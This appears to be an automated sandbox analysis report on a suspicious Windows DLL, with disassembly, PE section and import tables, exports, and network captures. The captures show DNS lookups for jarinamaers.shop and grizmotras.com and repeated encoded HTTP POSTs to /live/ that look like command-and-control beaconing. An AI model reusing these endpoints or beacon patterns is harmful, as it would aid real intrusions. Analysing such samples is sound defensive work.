mov ecx, dword ptr [eax+ecx+00000088h]
test ecx, ecx
je 00007F6B507EED75h
dec ecx
lea eax, dword ptr [ecx+ecx]
inc ebp
mov edx, eax
mov esi, dword ptr [eax+18h]
test esi, esi
jle 00007F6B507EED67h
inc esp
mov ebx, dword ptr [eax+20h]
mov ebx, dword ptr [eax+24h]
inc esp
mov esi, dword ptr [eax+1Ch]
dec ebp
add ebx, ecx
dec ecx
add ebx, ecx
movzx eax, word ptr [ebx]
dec eax
lea edi, dword ptr [esp+40h]
dec ecx
lea ecx, dword ptr [esi+eax*4]
inc ecx
mov eax, dword ptr [ebx]
inc edx
mov ebp, dword ptr [ecx+ecx]
dec ecx
add eax, ecx
jmp 00007F6B507EED0Ch
cmp cl, byte ptr [edi]
jne 00007F6B507EED0Eh
dec eax
inc eax
dec eax
inc edi
mov cl, byte ptr [eax]
test cl, cl
jne 00007F6B507EECF2h
mov cl, byte ptr [eax]
inc ecx
mov edx, eax
inc ecx
mov eax, eax
cmp cl, byte ptr [edi]
setnbe dl
cmp byte ptr [edi], cl
setnbe al
cmp edx, eax
je 00007F6B507EED14h
inc ecx
inc edx
dec eax
add ebx, 02h
dec ecx
add ebx, 04h
inc esp
cmp edx, esi
jl 00007F6B507EECB4h
jmp 00007F6B507EED06h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xc2be0	0x80	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2c60	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x173000	0x29d	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x16c000	0x6498	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0xcea98	0x3f48	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x174000	0xff0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9d5b0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x9d710	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9d610	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x86000	0xab8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x84928	0x84a00	e2e31c5c7e4fe3e525cff7a48eefeefe	False	0.47230280984919887	data	6.3882723524944875	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x86000	0x3edf6	0x3ee00	63cfc64e6b66f4b5f42495585448342f	False	0.33804982604373757	Sony PlayStation Audio	4.482248982092484	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc5000	0xa6518	0x3000	ff509d42bac4371303af1aa4cca9be90	False	0.23234049479166666	SysEx File -	4.608801437987786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x16c000	0x6498	0x6600	d7c0afebce54eaf77c27bc124f1f0d5d	False	0.5049402573529411	data	5.912256571930567	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x173000	0x29d	0x400	3d1e3133eddf2d7b64237cb5d873ee5d	False	0.298828125	data	3.495284342232033	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x174000	0xff0	0x1000	6f76baeca3addf9f1f068a1e0392fd3e	False	0.360595703125	data	5.417278568480602	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
yhDm^	0x175000	0xf000	0xf000	7a41175d3a562a1c35ae7ae6deea74c5	False	0.6556315104166667	data	7.504515438356259	IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_RCDATA	0x1730a0	0x80	ASCII text, with no line terminators	Chinese	China	0.09375
RT_MANIFEST	0x173120	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	GlobalLock, GlobalSize, GlobalUnlock, GetFileAttributesExW, GetTickCount, DeviceIoControl, GetCurrentProcessId, GetLongPathNameW, GetWindowsDirectoryW, GetCurrentDirectoryW, MoveFileExW, SearchPathW, CreateThread, WaitForSingleObject, GetCurrentThreadId, GetVersion, GetSystemDefaultUILanguage, GetFileSize, GetLocalTime, VirtualProtect, GetModuleHandleExW, IsBadStringPtrW, ProcessIdToSessionId, OpenProcess, CreateProcessW, WTSGetActiveConsoleSessionId, MapViewOfFile, UnmapViewOfFile, GetProcessId, LocalAlloc, LocalFree, CreateFileMappingW, GetFileSizeEx, GlobalFree, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, ResumeThread, GetSystemTimeAsFileTime, ReleaseMutex, GetSystemTime, SystemTimeToFileTime, SetFileAttributesW, DeleteFileW, OpenFileMappingW, OpenThread, GetCommandLineW, OutputDebugStringW, RtlPcToFileHeader, FormatMessageW, CreateFileA, LocalFileTimeToFileTime, SetFilePointerEx, HeapLock, HeapUnlock, HeapWalk, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, GetFileTime, GlobalAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, InitializeSListHead, InterlockedFlushSList, ExitProcess, OpenMutexW, CreateMutexW, WideCharToMultiByte, FindResourceExW, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, RaiseException, InitializeCriticalSection, lstrcmpiW, DeleteCriticalSection, SetLastError, CloseHandle, GetLastError, LoadLibraryW, GetSystemDirectoryW, SetFilePointer, GetVersionExW, GetSystemWindowsDirectoryW, FindResourceW, SizeofResource, LoadResource, LockResource, FreeResource, GetFileInformationByHandle, CreateFileW, Sleep, ReadFile, LeaveCriticalSection, EnterCriticalSection, MultiByteToWideChar, LoadLibraryExW, ExpandEnvironmentStringsW, FreeLibrary, GetCurrentProcess, GetProcAddress, GetModuleHandleW, GetFileAttributesW, GetProcessHeap, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, HeapDestroy, WriteFile, GetExitCodeProcess, IsDebuggerPresent
USER32.dll	IsZoomed, GetWindowTextW, SendMessageTimeoutW, SystemParametersInfoW, EnumDisplayDevicesW, GetLastInputInfo, GetClassNameW, GetShellWindow, GetWindowInfo, EnumWindows, WindowFromPoint, GetWindowRect, GetDesktopWindow, GetSystemMetrics, GetWindow, IsWindowVisible, CharNextW, FindWindowW, IsWindow, GetForegroundWindow, MonitorFromWindow, wsprintfW, GetWindowThreadProcessId, SetForegroundWindow, LoadStringW, GetAncestor
ADVAPI32.dll	RegDeleteKeyW, ConvertStringSecurityDescriptorToSecurityDescriptorW, LookupAccountSidW, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateProcessAsUserW, CloseServiceHandle, QueryServiceStatus, StartServiceW, ChangeServiceConfigW, OpenServiceW, OpenSCManagerW, GetSidSubAuthority, GetSidSubAuthorityCount, GetTokenInformation, FreeSid, GetLengthSid, SetTokenInformation, AllocateAndInitializeSid, CreateRestrictedToken, DuplicateTokenEx, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, CryptReleaseContext, CryptGenRandom, CryptAcquireContextW, RegEnumValueW, RegCreateKeyW, RegQueryInfoKeyW, RegSetValueExW, RegDeleteValueW, RegEnumKeyExW, RegCreateKeyExW, RegCloseKey, RegQueryValueExW, RegEnumKeyW, RegOpenKeyExW, RegQueryValueExA
SHELL32.dll	SHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteExW, ShellExecuteW, SHGetSpecialFolderPathW, SHGetFileInfoW, SHGetDesktopFolder, SHGetMalloc
ole32.dll	GetHGlobalFromStream, IIDFromString, StringFromGUID2, CoInitialize, CreateStreamOnHGlobal, CoCreateInstance, CoTaskMemRealloc, CoTaskMemAlloc, CoTaskMemFree, CoUninitialize
OLEAUT32.dll	SysAllocStringByteLen, SafeArrayPutElement, VariantChangeType, VariantInit, SafeArrayCreate, SafeArrayGetElement, VariantClear, SysStringByteLen, SysFreeString, SysAllocString, VarUI4FromStr
SHLWAPI.dll	PathRemoveFileSpecW, PathAppendW, SHSetValueW, SHGetValueW, PathAddBackslashW, PathFileExistsW, StrCmpNIW, PathFindFileNameW, PathIsRelativeW, StrCpyNW, PathIsDirectoryW, StrPBrkA, StrPBrkW, StrStrIA, StrStrIW, PathFindExtensionW, SHEnumValueW, StrCmpIW, PathCombineW, StrRetToBufW
WS2_32.dll	WSACleanup, WSCDeinstallProvider, WSCDeinstallProvider32, WSCUnInstallNameSpace, WSAGetLastError, WSAStartup, ntohl, htons, htonl, ntohs
VERSION.dll	VerQueryValueW
IPHLPAPI.DLL	GetIpAddrTable
WTSAPI32.dll	WTSFreeMemory, WTSQueryUserToken, WTSQuerySessionInformationW
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock
PSAPI.DLL	GetModuleFileNameExW
msvcrt.dll	wcstol, realloc, wcsspn, wcscspn, _mbsstr, _mbsrchr, _mktime64, towupper, memmove, memset, _CxxThrowException, ??0exception@@QEAA@AEBQEBD@Z, ??0exception@@QEAA@AEBV0@@Z, ??1exception@@UEAA@XZ, ?what@exception@@UEBAPEBDXZ, memcpy, memcmp, wcscmp, _amsg_exit, __getmainargs, _initterm, __CxxFrameHandler, __DestructExceptionObject, _localtime64, ___lc_codepage_func, rand, atoi, wcspbrk, __pctype_func, tolower, ___mb_cur_max_func, strtol, localeconv, ___lc_handle_func, abort, memchr, _wcstoui64, _msize, _XcptFilter, mbtowc, strrchr, iswctype, srand, ceil, log10, _clearfp, ?terminate@@YAXXZ, _wtoi, malloc, free, wcsstr, wcschr, wcsncmp, __C_specific_handler, ??_V@YAXPEAX@Z, ??3@YAXPEAX@Z, _wtoi64, _wcsupr, _wcslwr, _strlwr, strchr, _time64, _wcsnicmp, ??2@YAPEAX_K@Z, _wcsicmp, wcsrchr, calloc, iswspace, _errno, ??_U@YAPEAX_K@Z, sqrt

Exports

Name	Ordinal	Address
CreateObject	2	0x180004844
homq	1	0x18001b208
RegisterInstallTime	3	0x18005b578

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 22:44:19.050565958 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:19.050602913 CEST	443	49726	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:19.050667048 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:19.060827017 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:19.060859919 CEST	443	49726	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:19.298181057 CEST	443	49726	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:19.298252106 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:19.368861914 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:19.368897915 CEST	443	49726	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:19.369339943 CEST	443	49726	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:19.369664907 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:19.371786118 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:19.416115999 CEST	443	49726	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:24.088558912 CEST	443	49726	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:24.088675976 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:24.088699102 CEST	443	49726	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:24.088854074 CEST	443	49726	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:24.088932037 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:24.089143038 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:24.089282036 CEST	49726	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:24.089297056 CEST	443	49726	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:25.252623081 CEST	49727	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:25.252660990 CEST	443	49727	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:25.252739906 CEST	49727	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:25.253062963 CEST	49727	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:25.253074884 CEST	443	49727	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:25.489451885 CEST	443	49727	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:25.489528894 CEST	49727	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:25.490319967 CEST	49727	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:25.490336895 CEST	443	49727	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:25.497419119 CEST	49727	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:25.497441053 CEST	443	49727	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:31.125051022 CEST	443	49727	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:31.125108004 CEST	49727	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:31.125117064 CEST	443	49727	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:31.125169992 CEST	49727	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:31.125508070 CEST	49727	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:31.125521898 CEST	443	49727	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:31.213733912 CEST	49728	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:31.213778019 CEST	443	49728	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:31.213864088 CEST	49728	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:31.214157104 CEST	49728	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:31.214169025 CEST	443	49728	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:31.444214106 CEST	443	49728	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:31.444282055 CEST	49728	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:31.444848061 CEST	49728	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:31.444859028 CEST	443	49728	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:31.446533918 CEST	49728	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:31.446540117 CEST	443	49728	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:44.180743933 CEST	443	49728	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:44.180819035 CEST	443	49728	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:44.180851936 CEST	49728	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:44.181051016 CEST	49728	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:44.181186914 CEST	49728	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:44.181204081 CEST	443	49728	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:44.322779894 CEST	49729	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:44.322820902 CEST	443	49729	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:44.323044062 CEST	49729	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:44.323637962 CEST	49729	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:44.323652029 CEST	443	49729	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:44.555305958 CEST	443	49729	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:44.555435896 CEST	49729	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:44.557426929 CEST	49729	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:44.557426929 CEST	49729	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:44.557442904 CEST	443	49729	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:44.557461023 CEST	443	49729	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:58.679569960 CEST	443	49729	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:58.679693937 CEST	443	49729	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:58.679738998 CEST	49729	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:58.679795980 CEST	49729	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:58.680145025 CEST	49729	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:44:58.680181026 CEST	443	49729	172.67.136.103	192.168.2.5
Apr 25, 2024 22:44:59.203442097 CEST	49730	443	192.168.2.5	172.67.219.28
Apr 25, 2024 22:44:59.203481913 CEST	443	49730	172.67.219.28	192.168.2.5
Apr 25, 2024 22:44:59.203551054 CEST	49730	443	192.168.2.5	172.67.219.28
Apr 25, 2024 22:44:59.230818033 CEST	49730	443	192.168.2.5	172.67.219.28
Apr 25, 2024 22:44:59.230848074 CEST	443	49730	172.67.219.28	192.168.2.5
Apr 25, 2024 22:44:59.466718912 CEST	443	49730	172.67.219.28	192.168.2.5
Apr 25, 2024 22:44:59.466790915 CEST	49730	443	192.168.2.5	172.67.219.28
Apr 25, 2024 22:44:59.473687887 CEST	49730	443	192.168.2.5	172.67.219.28
Apr 25, 2024 22:44:59.473706961 CEST	443	49730	172.67.219.28	192.168.2.5
Apr 25, 2024 22:44:59.473969936 CEST	443	49730	172.67.219.28	192.168.2.5
Apr 25, 2024 22:44:59.474016905 CEST	49730	443	192.168.2.5	172.67.219.28
Apr 25, 2024 22:44:59.475369930 CEST	49730	443	192.168.2.5	172.67.219.28
Apr 25, 2024 22:44:59.516119003 CEST	443	49730	172.67.219.28	192.168.2.5
Apr 25, 2024 22:45:08.297723055 CEST	443	49730	172.67.219.28	192.168.2.5
Apr 25, 2024 22:45:08.297853947 CEST	443	49730	172.67.219.28	192.168.2.5
Apr 25, 2024 22:45:08.297951937 CEST	49730	443	192.168.2.5	172.67.219.28
Apr 25, 2024 22:45:08.298283100 CEST	49730	443	192.168.2.5	172.67.219.28

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 22:44:18.901473045 CEST	53114	53	192.168.2.5	1.1.1.1
Apr 25, 2024 22:44:19.043672085 CEST	53	53114	1.1.1.1	192.168.2.5
Apr 25, 2024 22:44:59.056463957 CEST	51743	53	192.168.2.5	1.1.1.1
Apr 25, 2024 22:44:59.202184916 CEST	53	51743	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2024 22:44:18.901473045 CEST	192.168.2.5	1.1.1.1	0x9834	Standard query (0)	jarinamaers.shop	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:44:59.056463957 CEST	192.168.2.5	1.1.1.1	0x31c5	Standard query (0)	grizmotras.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 25, 2024 22:44:19.043672085 CEST	1.1.1.1	192.168.2.5	0x9834	No error (0)	jarinamaers.shop	172.67.136.103	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:44:19.043672085 CEST	1.1.1.1	192.168.2.5	0x9834	No error (0)	jarinamaers.shop	104.21.46.75	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:44:59.202184916 CEST	1.1.1.1	192.168.2.5	0x31c5	No error (0)	grizmotras.com	172.67.219.28	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:44:59.202184916 CEST	1.1.1.1	192.168.2.5	0x31c5	No error (0)	grizmotras.com	104.21.59.82	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jarinamaers.shop

grizmotras.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49726	172.67.136.103	443	2928	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:44:19 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 252 Cache-Control: no-cache
2024-04-25 20:44:19 UTC	252	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 39 6a 6c 32 61 36 39 74 4f 6c 4c 57 58 38 56 62 36 47 37 53 49 73 78 61 54 33 6d 38 49 50 37 77 54 52 63 70 57 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c 44 34 34 36 7a 6b 6c 57 6a 51 57 64 6d 37 44 7a 2f 4a 6a 49 30 4c 59 50 48 4a 51 6c 77 35 62 79 6a 5a 4c 30 76 38 45 63 32 62 47 74 6a 38 65 4f 48 65 72 71 58 75 70 2f 52 64 48 48 4d 35 72 4a 53 42 39 44 57 51 3d 3d Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiC09jl2a69tOlLWX8Vb6G7SIsxaT3m8IP7wTRcpWBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uLD446zklWjQWdm7Dz/JjI0LYPHJQlw5byjZL0v8Ec2bGtj8eOHerqXup/RdHHM5rJSB9DWQ==
2024-04-25 20:44:24 UTC	576	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:44:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ChtFZ6XUFfwV0u76mAgWZU6CI6wzO8Ew0AwMJH01ZaOnExMmj3a5PdOPtZNam8FcEFUjsYmrsWwjbffYDDW%2F959NyVFL%2F3CF85m4nmxnkLw6DWe%2FUkJFaMm%2BamzK%2BM3PM1jb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a12b9ddbc17cc4-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:44:24 UTC	26	IN	Data Raw: 31 34 0d 0a 51 68 4f 6d 4d 42 32 6e 70 54 56 71 44 4a 4f 6f 63 51 3d 3d 0d 0a Data Ascii: 14QhOmMB2npTVqDJOocQ==
2024-04-25 20:44:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49727	172.67.136.103	443	2928	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:44:25 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 180 Cache-Control: no-cache
2024-04-25 20:44:25 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 39 6a 6c 32 61 36 39 74 4f 6c 4c 57 58 38 56 62 36 47 37 53 49 73 78 61 54 33 6d 38 49 50 37 77 54 52 63 70 57 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c Data Ascii: YjOeEyiMk3RqE5vcC/HWCbEd2NSiC09jl2a69tOlLWX8Vb6G7SIsxaT3m8IP7wTRcpWBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-25 20:44:31 UTC	578	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:44:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKmLBIkLT9qZ5NkyZQ%2B1K%2FprTo1edfbIjl0hCxSRf6lRhtCYIHHp%2BqT7q7wp5g7SuOfJOy1H3Ve4HlHhMMmSE9BQgGb75eeOayKrqTyTHrxa7VIQ2S%2BJNv5%2BXt%2Bcq7ep5KG5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a12bc49906b054-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:44:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49728	172.67.136.103	443	2928	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:44:31 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 180 Cache-Control: no-cache
2024-04-25 20:44:31 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 39 6a 6c 32 61 36 39 74 4f 6c 4c 57 58 38 56 62 36 47 37 53 49 73 78 61 54 33 6d 38 49 50 37 77 54 52 63 70 57 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c Data Ascii: YjOeEyiMk3RpE5vcC/HWCbEd2NSiC09jl2a69tOlLWX8Vb6G7SIsxaT3m8IP7wTRcpWBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-25 20:44:44 UTC	572	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:44:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYHWmf%2F%2F5zKevmXYZaJMc8BTtA6PfG3RoMKWVlDajoq3TlGW5KQwX0d4hdLm9fHr9A9OAEXe7PZrl822KlEV46D5oBXvpsUpIoGA29OT5Ilf8kHUhua3NGej%2FpwuOtxsrEgt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a12be9d9a44519-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:44:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49729	172.67.136.103	443	2928	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:44:44 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 180 Cache-Control: no-cache
